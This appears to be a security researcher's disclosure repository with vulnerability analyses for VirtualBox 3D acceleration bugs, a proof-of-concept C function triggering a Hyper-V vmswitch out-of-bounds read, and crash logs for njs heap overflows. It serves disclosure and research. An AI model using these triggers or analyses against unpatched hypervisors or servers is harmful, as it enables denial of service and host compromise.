poc.c - proof of concept code which demonstrates an out of bounds write by default. -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crServerDispatchGenProgramsARB/screens/crash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-XXXX_VirtualBox/crServerDispatchGenProgramsARB/screens/crash.png -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crServerDispatchGenQueriesARB/analysis.txt: -------------------------------------------------------------------------------- 1 | Buffer overflow in Oracle VirtualBox crServerDispatchGenQueriesARB 2 | 3 | Tested: VirtualBox v5.2.16 x64 4 | Guest VM: Windows 7 x64 5 | Host OS: Windows 10 x64 (April 2018) 6 | 7 | 8 | There is an integer overflow vulnerability in the Oracle VirtualBox 3D Acceleration component, that can be reached from a non-privileged Guest VM by sending a specially crafted packet of OpenGL commands to the VirtualBox Guest Additions kernel mode driver. The vulnerability potentially allows to execute arbitrary code on the virtualisation host. 9 | 10 | The memory corruption happens during the processing of the CR_GENQUERIESARB_EXTEND_OPCODE opcode of the Chromium protocol. The actual bug is in the code of crServerDispatchGenQueriesARB function (/src/VBox/HostServices/SharedOpenGL/crserverlib/server_occlude.c): 11 | 12 | void SERVER_DISPATCH_APIENTRY 13 | crServerDispatchGenQueriesARB(GLsizei n, GLuint *queries) 14 | { 15 | GLuint *local_queries = (GLuint *) crAlloc( n * sizeof(*local_queries) ); // <-------- (0) 16 | (void) queries; 17 | cr_server.head_spu->dispatch_table.GenQueriesARB( n, local_queries ); 18 | crServerReturnValue( local_queries, n * sizeof(*local_queries) ); 19 | crFree( local_queries ); 20 | } 21 | 22 | The arguments to crServerDispatchGenQueriesARB are controlled by the Guest VM. At line (0), the calculation of the memory allocation can overflow, if `n` is larger than 0x40000000. Then crAlloc will allocate a buffer which is too small to hold `n` entities. The too-small buffer is then passed to the OS-specific GL function GenQueriesARB, that will write beyond the end of the provided memory buffer. 23 | 24 | 25 | Note: while the root cause of the bug is in the code of VirtualBox, the actual memory corruption happens in the OpenGL code provided by the Host OS. Thus it is recommended to test the bug in exactly the same environment as listed in the header of this report to ensure reproducibility. 26 | 27 | 28 | See also: 29 | VBox.log - crash log from VirtualBox VM. 30 | windbg.log - crash log from kernel debugger, demonstrating a heap corruption on the host. 31 | poc.c - proof of concept code. -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crServerDispatchGenQueriesARB/logs/windbg.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-XXXX_VirtualBox/crServerDispatchGenQueriesARB/logs/windbg.log -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crServerDispatchPrioritizeTextures/analysis.txt: -------------------------------------------------------------------------------- 1 | Buffer overflow in crServerDispatchPrioritizeTextures 2 | 3 | Testing: VirtualBox v5.2.12 x64 4 | VM: Windows 7 x64 5 | Host OS: Windows 10 x64, April 2018 6 | 7 | 8 | Integer overflow in crServerDispatchPrioritizeTextures (VirtualBox-5.2.12/src/VBox/HostServices/SharedOpenGL/crserverlib/server_texture.c): 9 | 10 | void SERVER_DISPATCH_APIENTRY crServerDispatchPrioritizeTextures( GLsizei n, const GLuint * textures, const GLclampf * priorities ) 11 | { 12 | GLuint *newTextures = (GLuint *) crAlloc(n * sizeof(GLuint)); // <——————— (1) 13 | GLint i; 14 | 15 | if (!newTextures) 16 | { 17 | crError("crServerDispatchDeleteTextures: out of memory"); 18 | return; 19 | } 20 | 21 | crStatePrioritizeTextures(n, textures, priorities); 22 | 23 | for (i = 0; i < n; i++) 24 | { 25 | newTextures[i] = crStateGetTextureHWID(textures[i]); <——————— (0) 26 | } 27 | 28 | cr_server.head_spu->dispatch_table.PrioritizeTextures(n, newTextures, priorities); 29 | crFree(newTextures); 30 | } 31 | 32 | On line 1, the number of bytes to be allocated is calculated from the input argument `n`, which is fully controlled by the Guest VM via Chromium protocol. The `n` variable is of type GLsizei, which is a signed integer, and GLuint is of size 4. Therefore the expression will evaluate to 0 if the value of `n` is 0x40000000. crAlloc then will allocate a zero-sized buffer. Follows is an out of bounds write (line 0) of possibly 0x40000000 bytes of length. 33 | 34 | See also: 35 | windbg.log - demonstration of a heap corruption 36 | VirtualBox.log - crash log from VirtualBox VM -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crServerDispatchPrioritizeTextures/logs/windbg.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-XXXX_VirtualBox/crServerDispatchPrioritizeTextures/logs/windbg.log -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crUnpackPixelMapuiv/analysis.txt: -------------------------------------------------------------------------------- 1 | Arbitrary pointer dereference in Oracle VirtualBox “crUnpackPixelMapuiv” 2 | 3 | Testing: VirtualBox v5.2.12 x64 4 | VM: Windows 7 x64 5 | Host OS: Windows 10 x64, April 2018 6 | 7 | 8 | VirtualBox’s Chromium host-side code blindly trusts the pointer provided by the VM while handling the CR_GETPIXELMAPUIV_EXTEND_OPCODE. The bug is in crUnpackPixelMapuiv (/VirtualBox-5.2.12/src/VBox/HostServices/SharedOpenGL/unpacker/unpack_pixelmap.c): 9 | 10 | void crUnpackPixelMapuiv( void ) 11 | { 12 | GLenum map = READ_DATA( sizeof( int ) + 0, GLenum ); 13 | GLsizei mapsize = READ_DATA( sizeof( int ) + 4, GLsizei ); 14 | int nodata = READ_DATA( sizeof(int) + 8, int); 15 | GLuint *values; 16 | 17 | if (nodata) 18 | values = (GLuint*) (uintptr_t) READ_DATA(sizeof(int) + 12, GLint); 19 | else 20 | values = DATA_POINTER( sizeof( int ) + 16, GLuint ); // —————> (1) 21 | 22 | cr_unpackDispatch.PixelMapuiv( map, mapsize, values ); // —————> (0) 23 | INCR_VAR_PTR(); 24 | } 25 | 26 | In the prologue, it reads data values (via READ_DATA) directly from the Chromium SPU sent by the VM, which is fully controlled by the attacker. In case that the `nodata` variable read from the SPU is true, then it also reads a data pointer (via DATA_POINTER) into the `values` variable (line (1)). This pointer is then passed as the 3rd argument to OpenGL’s PixelMapuiv, where it is dereferenced for a certain memory operation. For example, if we set `values` to 0xF1414141, then an read a/v is observed at address 0xfffffffff1414141. 27 | 28 | Note: because PixelMapuiv is provided by the host environment, it may behave differently in a different host OS. 29 | 30 | See also: 31 | VBox.log - crash log from VirtualBox VM 32 | crash.png - screenshot of the crash -------------------------------------------------------------------------------- /CVE-2018-XXXX_VirtualBox/crUnpackPixelMapuiv/screens/crash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2018-XXXX_VirtualBox/crUnpackPixelMapuiv/screens/crash.png -------------------------------------------------------------------------------- /CVE-2019-0717_Hyper-V/PoC_CVE-2019-0717.c: -------------------------------------------------------------------------------- 1 | /* 2 | Proof-of-concept testcase for Microsoft Hyper-V CVE-2019-0717 3 | Virtual Network Switch (vmswitch.sys) VmsMpCommonPvtSetRequestCommon Out-of-bounds Read Vulnerability 4 | Discovered independently by Alisa Esage, reported to Microsoft by someone else 5 | URL: https://0days.engineer 6 | */ 7 | 8 | int bug_VmsMpCommonPvtSetRequestCommon(struct netvsc_device *nvdev, 9 | const char *mac) 10 | { 11 | struct rndis_device *rdev = nvdev->extension; 12 | struct rndis_request *request; 13 | struct rndis_set_request *set; 14 | struct rndis_config_parameter_info *cpi; 15 | wchar_t *cfg_nwadr, *cfg_mac; 16 | struct rndis_set_complete *set_complete; 17 | char macstr[2*ETH_ALEN+1]; 18 | u32 extlen = sizeof(struct rndis_config_parameter_info) + 19 | 6; 20 | int ret; 21 | 22 | request = get_rndis_request(rdev, RNDIS_MSG_SET, 23 | RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen); 24 | if (!request) 25 | return -ENOMEM; 26 | 27 | set = &request->request_msg.msg.set_req; 28 | set->oid = RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER; 29 | set->info_buflen = extlen; 30 | set->info_buf_offset = sizeof(struct rndis_set_request); 31 | set->dev_vc_handle = 0; 32 | 33 | cpi = (struct rndis_config_parameter_info *)((ulong)set + 34 | set->info_buf_offset); 35 | cpi->parameter_name_offset = 36 | sizeof(struct rndis_config_parameter_info) + 6; 37 | /* Multiply by 2 because host needs 2 bytes (utf16) for each char */ 38 | cpi->parameter_name_length = 0; 39 | cpi->parameter_type = RNDIS_CONFIG_PARAM_TYPE_STRING; 40 | cpi->parameter_value_offset = 41 | cpi->parameter_name_offset; 42 | /* Multiply by 4 because each MAC byte displayed as 2 utf16 chars */ 43 | cpi->parameter_value_length = 0; 44 | 45 | ret = rndis_filter_send_request(rdev, request); 46 | if (ret != 0) 47 | goto cleanup; 48 | 49 | wait_for_completion(&request->wait_event); 50 | 51 | set_complete = &request->response_msg.msg.set_complete; 52 | if (set_complete->status != RNDIS_STATUS_SUCCESS) 53 | ret = -EIO; 54 | 55 | cleanup: 56 | put_rndis_request(rdev, request); 57 | return ret; 58 | } 59 | -------------------------------------------------------------------------------- /CVE-2019-0717_Hyper-V/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2019-0717: Hyper-V vmswitch.sys Out of Bounds Read DoS Vulnerability 4 | 5 | I found this bug in 2018 with a custom fuzzer that I wrote as part of the initial reconnaissance of Microsoft Hyper-V architecture and attack vectors. This is a Tier 1 [host OS kernel] vulnerability per the [Microsoft's taxonomy](https://www.microsoft.com/en-us/msrc/bounty-hyper-v), that qualifies for a $50K bounty via the [Microsoft Azure Bounty Program](https://www.microsoft.com/en-us/msrc/bounty-microsoft-azure). 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery and analysis, Proof-of-concept: Alisa Esage [[0days.engineer](https://0days.engineer)] -------------------------------------------------------------------------------- /CVE-2019-0717_Hyper-V/screens/bugcheck.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2019-0717_Hyper-V/screens/bugcheck.jpeg -------------------------------------------------------------------------------- /CVE-2019-0717_Hyper-V/screens/lis.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2019-0717_Hyper-V/screens/lis.jpeg -------------------------------------------------------------------------------- /CVE-2019-0717_Hyper-V/screens/patched_code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2019-0717_Hyper-V/screens/patched_code.png -------------------------------------------------------------------------------- /CVE-2019-FFFF_nginx_njs/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2019-FFFF: nginx module njs Heap Buffer Overflow Vulnerability (multiple) 4 | 5 | **TBA** 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage -------------------------------------------------------------------------------- /CVE-2019-FFFF_nginx_njs/njs_array_prototype_concat/logs/asan.log: -------------------------------------------------------------------------------- 1 | ================================================================= 2 | ==7601==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000004900 at pc 0x55e6058d4b50 bp 0x7fff5bf46870 sp 0x7fff5bf46868 3 | WRITE of size 16 at 0x625000004900 thread T0 4 | #0 0x55e6058d4b4f in njs_array_copy njs/njs_array.c:1167 5 | #1 0x55e6058d4b4f in njs_array_prototype_concat njs/njs_array.c:1146 6 | #2 0x55e6058e205c in njs_function_native_call njs/njs_function.c:515 7 | #3 0x55e6058b6408 in njs_vmcode_function_call njs/njs_vm.c:2042 8 | #4 0x55e6058b3868 in njs_vmcode_interpreter njs/njs_vm.c:152 9 | #5 0x55e6058b19ba in njs_vm_start njs/njs.c:584 10 | #6 0x55e6058aed81 in njs_process_script njs/njs_shell.c:603 11 | #7 0x55e6058af69c in njs_process_file njs/njs_shell.c:512 12 | #8 0x55e6058afa65 in main njs/njs_shell.c:229 13 | #9 0x7ff1b22a92e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0) 14 | #10 0x55e6058ad269 in _start (/media/psf/Code/njs/build/njs.asan+0x21269) 15 | 16 | 0x625000004900 is located 0 bytes to the right of 8192-byte region [0x625000002900,0x625000004900) 17 | allocated by thread T0 here: 18 | #0 0x7ff1b2e99760 in posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc2760) 19 | #1 0x55e60590bcbb in nxt_memalign nxt/nxt_malloc.c:26 20 | 21 | SUMMARY: AddressSanitizer: heap-buffer-overflow njs/njs_array.c:1167 in njs_array_copy 22 | Shadow bytes around the buggy address: 23 | 0x0c4a7fff88d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 | 0x0c4a7fff88e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 25 | 0x0c4a7fff88f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 | 0x0c4a7fff8900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 27 | 0x0c4a7fff8910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 | =>0x0c4a7fff8920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 29 | 0x0c4a7fff8930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 30 | 0x0c4a7fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 31 | 0x0c4a7fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 32 | 0x0c4a7fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 33 | 0x0c4a7fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 34 | Shadow byte legend (one shadow byte represents 8 application bytes): 35 | Addressable: 00 36 | Partially addressable: 01 02 03 04 05 06 07 37 | Heap left redzone: fa 38 | Heap right redzone: fb 39 | Freed heap region: fd 40 | Stack left redzone: f1 41 | Stack mid redzone: f2 42 | Stack right redzone: f3 43 | Stack partial redzone: f4 44 | Stack after return: f5 45 | Stack use after scope: f8 46 | Global redzone: f9 47 | Global init order: f6 48 | Poisoned by user: f7 49 | Container overflow: fc 50 | Array cookie: ac 51 | Intra object redzone: bb 52 | ASan internal: fe 53 | Left alloca redzone: ca 54 | Right alloca redzone: cb 55 | ==7601==ABORTING 56 | -------------------------------------------------------------------------------- /CVE-2019-FFFF_nginx_njs/njs_string_prototype_concat/logs/asan.log: -------------------------------------------------------------------------------- 1 | ================================================================= 2 | ==3563==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f00000fa10 at pc 0x7f9d435b2d7b bp 0x7ffc23863f50 sp 0x7ffc23863700 3 | WRITE of size 536870912 at 0x61f00000fa10 thread T0 4 | #0 0x7f9d435b2d7a (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x5cd7a) 5 | #1 0x55ce9f9edf9f in njs_string_prototype_concat njs/njs_string.c:877 6 | #2 0x55ce9fa0c05c in njs_function_native_call njs/njs_function.c:515 7 | #3 0x55ce9f9e0408 in njs_vmcode_function_call njs/njs_vm.c:2042 8 | #4 0x55ce9f9dd868 in njs_vmcode_interpreter njs/njs_vm.c:152 9 | #5 0x55ce9f9db9ba in njs_vm_start njs/njs.c:584 10 | #6 0x55ce9f9d8d81 in njs_process_script njs/njs_shell.c:603 11 | #7 0x55ce9f9d969c in njs_process_file njs/njs_shell.c:512 12 | #8 0x55ce9f9d9a65 in main njs/njs_shell.c:229 13 | #9 0x7f9d42a282e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0) 14 | #10 0x55ce9f9d7269 in _start (/media/psf/Code/njs/build/njs.asan+0x21269) 15 | 16 | 0x61f00000fa10 is located 0 bytes to the right of 2960-byte region [0x61f00000ee80,0x61f00000fa10) 17 | allocated by thread T0 here: 18 | #0 0x7f9d43618760 in posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc2760) 19 | #1 0x55ce9fa35cbb in nxt_memalign nxt/nxt_malloc.c:26 20 | 21 | SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x5cd7a) 22 | Shadow bytes around the buggy address: 23 | 0x0c3e7fff9ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 | 0x0c3e7fff9f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 25 | 0x0c3e7fff9f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 | 0x0c3e7fff9f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 27 | 0x0c3e7fff9f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 | =>0x0c3e7fff9f40: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 29 | 0x0c3e7fff9f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 30 | 0x0c3e7fff9f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 31 | 0x0c3e7fff9f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 32 | 0x0c3e7fff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 33 | 0x0c3e7fff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 34 | Shadow byte legend (one shadow byte represents 8 application bytes): 35 | Addressable: 00 36 | Partially addressable: 01 02 03 04 05 06 07 37 | Heap left redzone: fa 38 | Heap right redzone: fb 39 | Freed heap region: fd 40 | Stack left redzone: f1 41 | Stack mid redzone: f2 42 | Stack right redzone: f3 43 | Stack partial redzone: f4 44 | Stack after return: f5 45 | Stack use after scope: f8 46 | Global redzone: f9 47 | Global init order: f6 48 | Poisoned by user: f7 49 | Container overflow: fc 50 | Array cookie: ac 51 | Intra object redzone: bb 52 | ASan internal: fe 53 | Left alloca redzone: ca 54 | Right alloca redzone: cb 55 | ==3563==ABORTING 56 | -------------------------------------------------------------------------------- /CVE-2019-FFFF_nginx_njs/njs_string_prototype_concat/logs/gdb.log: -------------------------------------------------------------------------------- 1 | ─── Output/messages ──────────────────────────────────────────────────────────────────────────────────── 2 | 3 | Program received signal SIGSEGV, Segmentation fault. 4 | ─── Assembly ─────────────────────────────────────────────────────────────────────────────────────────── 5 | 0x00007ffff73b3f3d __memmove_avx_unaligned_erms+349 cmp %rsi,%rdi 6 | 0x00007ffff73b3f40 __memmove_avx_unaligned_erms+352 ja 0x7ffff73b3ff1 <__memmove_avx_unaligned_erms+529> 7 | 0x00007ffff73b3f46 __memmove_avx_unaligned_erms+358 je 0x7ffff73b3e31 <__memmove_avx_unaligned_erms+81> 8 | 0x00007ffff73b3f4c __memmove_avx_unaligned_erms+364 vmovdqu (%rsi),%ymm4 9 | 0x00007ffff73b3f50 __memmove_avx_unaligned_erms+368 vmovdqu -0x20(%rsi,%rdx,1),%ymm5 10 | 0x00007ffff73b3f56 __memmove_avx_unaligned_erms+374 vmovdqu -0x40(%rsi,%rdx,1),%ymm6 11 | 0x00007ffff73b3f5c __memmove_avx_unaligned_erms+380 vmovdqu -0x60(%rsi,%rdx,1),%ymm7 12 | ─── Expressions ──────────────────────────────────────────────────────────────────────────────────────── 13 | ─── History ──────────────────────────────────────────────────────────────────────────────────────────── 14 | $$2 = 2147483658 15 | $$1 = 2147483658 16 | $$0 = 2147483658 17 | ─── Memory ───────────────────────────────────────────────────────────────────────────────────────────── 18 | ─── Registers ────────────────────────────────────────────────────────────────────────────────────────── 19 | rax 0x00007ffff628e01c rbx 0x00007ffff628e01c rcx 0x00007ffff628dffc rdx 0x000000007ffffffe 20 | rsi 0x4141414141414141 rdi 0x00007ffff628e01c rbp 0x00005555557b31f0 rsp 0x00007fffffffdd88 21 | r8 0xfffffffffffffffe r9 0x0000000000000000 r10 0x00007ffff628e01c r11 0x00007fff7628e01e 22 | r12 0x00007fffffffddb0 r13 0xffffffffffffffff r14 0x00005555557b3200 r15 0x00007fffffffddb0 23 | rip 0x00007ffff73b3f4c eflags [ CF PF SF IF RF ] cs 0x00000033 ss 0x0000002b 24 | ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 25 | ─── Source ───────────────────────────────────────────────────────────────────────────────────────────── 26 | Cannot display "/build/glibc-yWQXbR/glibc-2.24/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S" ([Errno 2] No such file or directory: '/build/glibc-yWQXbR/glibc-2.24/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S') 27 | ─── Stack ────────────────────────────────────────────────────────────────────────────────────────────── 28 | [0] from 0x00007ffff73b3f4c in __memmove_avx_unaligned_erms+364 at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:363 29 | (no arguments) 30 | [1] from 0x0000555555564f59 in njs_string_prototype_concat+473 at njs/njs_string.c:877 31 | arg vm = 0x5555557ab0c0 32 | arg args = 33 | arg nargs = 3 34 | arg unused = 35 | [+] 36 | ─── Threads ──────────────────────────────────────────────────────────────────────────────────────────── 37 | [1] id 3572 name njs from 0x00007ffff73b3f4c in __memmove_avx_unaligned_erms+364 at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:363 38 | ──────────────────────────────────────────────────────────────────────────────────────────────────────── 39 | __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:363 40 | 363 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory. 41 | >>> bt 42 | #0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:363 43 | #1 0x0000555555564f59 in njs_string_prototype_concat (vm=0x5555557ab0c0, args=, nargs=3, unused=) at njs/njs_string.c:877 44 | #2 0x0000555555570394 in njs_function_native_call (vm=0x5555557ab0c0, native=, args=, args_types=, nargs=, retval=93824994727392) at njs/njs_function.c:515 45 | #3 0x000055555555fee9 in njs_vmcode_function_call (vm=, invld=, retval=) at njs/njs_vm.c:2042 46 | #4 0x000055555555f241 in njs_vmcode_interpreter (vm=0x5555557ab0c0) at njs/njs_vm.c:152 47 | #5 0x000055555555e785 in njs_vm_start (vm=) at njs/njs.c:584 48 | #6 0x000055555555d602 in njs_process_script (console=0x5555557a94c0 , opts=0x7fffffffdf10, script=) at njs/njs_shell.c:603 49 | #7 0x000055555555dd31 in njs_interactive_shell (vm_options=0x7fffffffdef0, opts=0x7fffffffdf10) at njs/njs_shell.c:401 50 | #8 main (argc=, argv=) at njs/njs_shell.c:226 51 | >>> 52 | 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Disclosures 2 | 3 | Zero-day and N-day security vulnerability notes, analysis, and proof-of-concepts 4 | 5 | URL: https://github.com/badd1e/Disclosures 6 | 7 | ## List 8 | 9 | CVE-2009-2629: nginx http module Buffer Underflow Remote Code Execution Vulnerability 10 | Patch analysis, testcase, notes 11 | 12 | CVE-2013-0007: Microsoft XML Core Services 4-6 Use-after-free Vulnerability 13 | Vulnerability analysis, proof-of-concept exploit 14 | [Phrack paper](http://phrack.org/issues/69/10.html) 15 | 16 | CVE-2014-4060: Microsoft Windows Media Center CSyncBasePlayer Use-After-Free Remote Code Execution Vulnerability 17 | Analysis, testcase 18 | 19 | CVE-2014-XXXX: Schneider Electric InduSoft Web Access Memory Corruption Vulnerability (multiple) 20 | Testcases, analysis 21 | Part of a winning competition entry: Hack the smart city 2014 22 | 23 | CVE-2014-XXXX: Microsoft Office Word 2010 Memory Corruption Vulnerability 24 | Testcases, notes 25 | 26 | CVE-2015-2515: Windows Shell Use-after-free Remote Code Execution Vulnerability 27 | Testcases 28 | 29 | CVE-2016-0143: Microsoft Win32k Elevation of Privilege Vulnerability 30 | Vulnerability root cause analysis 31 | 32 | CVE-2016-0171: Microsoft Win32k Elevation of Privilege Vulnerability 33 | Vulnerability root cause analysis 34 | 35 | CVE-2017-XXXX: Jscript9 Type Confusion Remote Code Execution Vulnerability 36 | Testcase 37 | 38 | CVE-2017-FFFF: Windows Defender Javascript Use-after-free Vulnerability 39 | Testcase 40 | 41 | CVE-2018-0893: Microsoft Edge Type Confusion Vulnerability 42 | Testcase, analysis, proof-of-concept exploit 43 | 44 | CVE-2018-16845: nginx module mp4 Out Of Bounds Read Information Disclosure Vulnerability 45 | **TBD** 46 | 47 | CVE-2018-5144: Firefox ESR and Thunderbird Integer Overflow Remote Code Execution Vulnerability 48 | Theoretical analysis 49 | 50 | CVE-2018-5178: Firefox ESR and Thunderbird Buffer Overflow Remote Code Execution Vulnerability 51 | Theoretical analysis 52 | 53 | CVE-2018-6981: VMWare ESXi and Workstation Uninitialized Variable RCE 54 | Patch analysis, testcase 55 | 56 | CVE-2018-FFFF: Chromium ANGLE Uninitialized Variable RCE 57 | Theoretical analysis 58 | 59 | CVE-2018-XXXX: VirtualBox 3D Virtualization Memory Corruption Elevation of Privilege Vulnerability (multiple) 60 | Analysis 61 | 62 | CVE-2019-0717: Hyper-V vmswitch.sys Out of Bounds Read Vulnerability 63 | Proof-of-concept testcase 64 | 65 | CVE-2019-FFFF: nginx module njs Heap Buffer Overflow Vulnerability (multiple) 66 | **TBD** 67 | 68 | ## Legend 69 | 70 | CVE.*XXXX: the CVE was assigned, but I don't know it 71 | CVE.*FFFF: the CVE ID was never assigned 72 | 73 | ## Credits 74 | 75 | All vulns here were found and proof-of-concept exploits developed by Alisa Esage, unless stated otherwise. 76 | My trainings and mini-classes: [Zero Day Engineering](https://zerodayengineering.com/training). 77 | Twitter: [@alisaesage](https://twitter.com/alisaesage). --------------------------------------------------------------------------------